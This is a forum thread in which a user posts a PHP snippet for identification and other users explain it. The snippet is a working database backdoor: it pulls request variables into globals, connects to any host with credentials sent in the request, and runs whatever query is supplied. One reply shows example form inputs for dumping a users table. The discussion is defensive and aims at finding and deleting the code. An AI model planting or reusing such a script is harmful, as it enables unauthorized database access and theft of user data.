programmers alert: identify this php code please

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • johannes
    Confirmed User
    • Jul 2003
    • 855

    #1

    programmers alert: identify this php code please

    tell me what this code is supposed to do:

    <?php

    if (ini_get('register_globals') != '1') {
    /* We'll register the variables as globals: */
    if (!empty($HTTP_POST_VARS))
    extract($HTTP_POST_VARS);

    if (!empty($HTTP_GET_VARS))
    extract($HTTP_GET_VARS);

    if (!empty($HTTP_SERVER_VARS))
    extract($HTTP_SERVER_VARS);
    }

    $lnk = mysql_connect($host,$user,$pass);

    echo "<hr>Begin\n";

    if ($query) {
    $testquery = stripslashes($query);
    mysql_select_db($database, $lnk);

    $result = mysql_query($testquery) or die("Query failed : " . mysql_error());

    while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
    foreach ($line as $col_value) {
    echo "$col_value\t";
    }
    echo "\n";
    }
    }

    die ("<hr>End");


    ?>
  • Dragon Curve
    Confirmed User
    • Oct 2002
    • 252

    #2
    It checks firstly if register_globals is set, if not, it programatically sets it so that query/POST variables are set to normal variables.

    It then connects to the host specified in the parameters and executes the query specified in the parameters and returns the result set from it.

    Ultimately, it's to execute a query on a specified host remotely.

    Comment

    • teksonline
      So Fucking Banned
      • Jan 2005
      • 2904

      #3
      php coders

      looks like it needs 3 more php coders to remove the redundancy problem the first php coder created

      Comment

      • V_RocKs
        Damn Right I Kiss Ass!
        • Nov 2003
        • 32449

        #4
        It is basically a backdoor directly into your mysql...

        Comment

        • Robertf
          Confirmed User
          • Feb 2004
          • 392

          #5
          Delete it!!

          What ever it's used for ... it's one big backdoor ...
          ....

          Comment

          • quantum-x
            Confirmed User
            • Feb 2002
            • 6863

            #6
            There's a lot of redundant code to pass a query straight to your database.
            Bad, bad, bad.
            PrettyInCash.com - BoozedGFs.com - TeenGFs.com - JizzGFs.com- MilfUploads.com -

            Comment

            • AcidMax
              Confirmed User
              • May 2002
              • 1827

              #7
              As everyone else has said, it looks to see if it registers the variables globally (ie., takes a query string like ?info=123123 and sets it to $info automatically. If not, the extract function does so, then he is connecting to a db (and could easily pass $user,$pass,$host variables to connect right to your database, same with a $query string, for example:

              He could send a post request with the variables needed..

              <input type="user" value="mysql_username">
              <input type="pass value="mysql_pass">
              <input type="host" value="mysql_host">
              <input type="query" value="SELECT * FROM your_users_table">

              It would then return all your data in a tab delimited format when he submitted it. It its a HUGE backdoor to your db and to ANY db on your system as long as he has a user/pass for it. For that matter it could access any DB in the world as long as it was allowing your host to connect to the remote DB. It could even be used to hide their tracks if they were a hacker. Throw that on someone else's server and use it to gain access to another person's db so they don track it down. Its just an all around BAD script.
              Last edited by AcidMax; 04-03-2005, 06:10 AM.
              Latest MMA news. http://www.mmawrapup.com

              Comment

              • SMG
                Confirmed User
                • Aug 2003
                • 1798

                #8
                somebody wants to hump your site hehehe
                TGP Webmasters: sign up for the top 100 tgp list!
                Submit galleries
                If you add me to icq (title) make sure to mention GFY or I'll think you're a bot and deny you.

                Comment

                • arnette
                  Confirmed User
                  • Feb 2005
                  • 283

                  #9
                  yep, a backdoor for sure, too bad it wouldnt display the info properly though

                  Comment

                  • Tom_PM
                    Porn Meister
                    • Feb 2005
                    • 16443

                    #10
                    I prefer flat files.
                    43-922-863 Shut up and play your guitar.

                    Comment

                    • Barefootsies
                      Choice is an Illusion
                      • Feb 2005
                      • 42635

                      #11
                      Originally posted by arnette
                      yep, a backdoor for sure, too bad it wouldnt display the info properly though
                      More a less.

                      Should You Email Your Members?

                      Link1 | Link2 | Link3

                      Enough Said.

                      "Would you rather live like a king for a year or like a prince forever?"

                      Comment

                      • JSA Matt
                        So Fucking Banned
                        • Aug 2003
                        • 5464

                        #12
                        Very stupid code, I would delete it from whatever script you found it in

                        Comment

                        • Alex From San Diego
                          Confirmed User
                          • May 2001
                          • 1642

                          #13
                          Before you delete it, where did you find that code in?
                          We are what we repeatedly do.-Aristotle

                          Comment

                          • Jace
                            FBOP Class Of 2013
                            • Jan 2004
                            • 35562

                            #14
                            looks like code from an old version of oscommerce before they did away with that register globals shit

                            Comment

                            Working...